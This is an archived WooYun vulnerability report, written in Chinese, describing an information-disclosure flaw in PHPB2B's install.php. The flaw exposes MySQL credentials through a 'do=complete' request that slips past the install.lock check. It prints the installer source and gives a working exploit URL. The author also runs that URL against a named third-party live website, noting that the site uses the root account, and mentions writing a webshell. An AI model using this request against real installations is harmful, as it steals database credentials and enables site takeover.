乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-11: 细节已通知厂商并且等待厂商处理中 2015-02-16: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-04-12: 细节向核心白帽子及相关领域专家公开 2015-04-22: 细节向普通白帽子公开 2015-05-02: 细节向实习白帽子公开 2015-04-02: 细节向公众公开
PHPB2B某处漏洞直接查看mysql密码
PHPB2B某处漏洞直接查看mysql密码官网下载的最新版install/install.php安装文件,查看下代码。
<?php/** * [PHPB2B] Copyright (C) 2007-2099, Ualink Inc. All Rights Reserved. * The contents of this file are subject to the License; you may not use this file except in compliance with the License. * * @version $Revision: 2048 $ */session_start();error_reporting(E_ERROR | E_NOTICE);set_magic_quotes_runtime(0);ini_set('magic_quotes_sybase', 0);ini_set('max_execution_time', '300');if (isset($_GET['act'])) { if($_GET['act'] == "phpinfo"){ die(phpinfo()); }}if (!defined('DIRECTORY_SEPARATOR')) { define('DIRECTORY_SEPARATOR','/');}define('DS', DIRECTORY_SEPARATOR);define('TIME', time());define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());define('PHPB2B_ROOT', substr(dirname(__FILE__), 0, -7));define('MIN_PHP_VERSION', '5.0.0');//define('JSMIN_AS_LIB', true); // prevents auto-run on includerequire '../phpb2b_version.php';require '../configs/config.inc.php';require '../libraries/core/paths.php';if (version_compare(PHP_VERSION, MIN_PHP_VERSION, '<')) { echo 'PHPB2B '. PHPB2B_VERSION. ' require php'. MIN_PHP_VERSION.', but your php version is ' . PHP_VERSION . ".\n"; exit;}define('IN_PHPB2B',true);if(!defined('LIB_PATH')) define('LIB_PATH',PHPB2B_ROOT.'libraries'.DS);require '../libraries/global.func.php';require '../libraries/func.sql.php';require "../libraries/db_mysql.inc.php";require "../libraries/core/object.php";require "../libraries/core/controller.php";require "../libraries/file.class.php";require "../libraries/template.class.php";require "../libraries/source/error.class.php";list($accept_language) = explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']);if(file_exists(PHPB2B_ROOT. 'languages'.DS.strtolower($accept_language).DS."global.csv")) { $app_lang = strtolower($accept_language);}if (!is_writable(PHPB2B_ROOT."data".DS)) { echo PHPB2B_ROOT."data".DS. " is not writeable.\n"; exit;}if (!empty($_GET['app_lang'])) { $app_lang = $_GET['app_lang'];}if (!is_file(PHPB2B_ROOT."data".DS."language".DS.$app_lang.DS."default.conf")) { pb_configmake($app_lang);}if (!defined('CACHE_PATH')) { define('CACHE_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS); define('CACHE_LANG_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS); define('CACHE_COMMON_PATH', PHPB2B_ROOT."data".DS."cache".DS);}//language$smarty = new TemplateEngines();$sections = array('install', 'javascript');//da($smarty);$smarty->configLoad('default.conf', $sections);$arrTemplate = $smarty->getConfigVars();extract($arrTemplate);//:~$db = new DB_Sql();$file_cls = new Files();$pb_protocol = 'http';if ( isset( $_SERVER['HTTPS'] ) && ( strtolower( $_SERVER['HTTPS'] ) != 'off' ) ) { $pb_protocol = 'https';}$PHP_SELF = isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : preg_replace("/(.*)\.php(.*)/i", "\\1.php", $_SERVER['PHP_SELF']);$BASESCRIPT = basename($PHP_SELF);list($BASEFILENAME) = explode('.', $BASESCRIPT);$install_url = htmlspecialchars($pb_protocol."://".pb_getenv('HTTP_HOST').preg_replace("/\/+(api|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/');$siteUrl = substr($install_url,0,-(strlen($BASEFILENAME)+1));$time_stamp = TIME;if($_REQUEST){ if(!MAGIC_QUOTES_GPC) { $_REQUEST = pb_addslashes($_REQUEST); if($_COOKIE) $_COOKIE = pb_addslashes($_COOKIE); } extract($_REQUEST, EXTR_SKIP);}if(!isset($_GET['step'])) { $step = '1';}else{ $step = intval($_GET['step']);}if (isset($_GET['do'])) { $do = trim($_GET['do']); if($do == "complete"){ include "step".$step.".inc.php"; exit; }}if(file_exists(PHPB2B_ROOT.'data/install.lock')) { $msg = L("install_locked", "tpl"); Errors::showError($msg); exit;}
只要传入do=complete就可以包含step文件但是权限检测却在104-108行
if(file_exists(PHPB2B_ROOT.'data/install.lock')) { $msg = L("install_locked", "tpl"); Errors::showError($msg); exit;}
这样的话,我们虽然不能重装,但是却可以拿到重要信息。比如mysql数据库账号密码!!本机演示。http://127.0.0.1/phpb2b/install/install.php?step=5&app_lang=zh-cn&do=complete
因为默认不删除install.php文件,也就是只要安装了phpb2b,那么肯定可以查看msyql密码了,如果开启了远程连接,或者phpmyadmin,直接拿后台密码、写入shell,各种你懂的。因为官方删除了install文件夹,不能演示。网上随便找了个网站。http://en.csjci.com/install/install.php?step=5&app_lang=zh-cn&do=complete
还是root呢~
过滤
危害等级:无影响厂商忽略
忽略时间:2015-04-02 10:23
暂无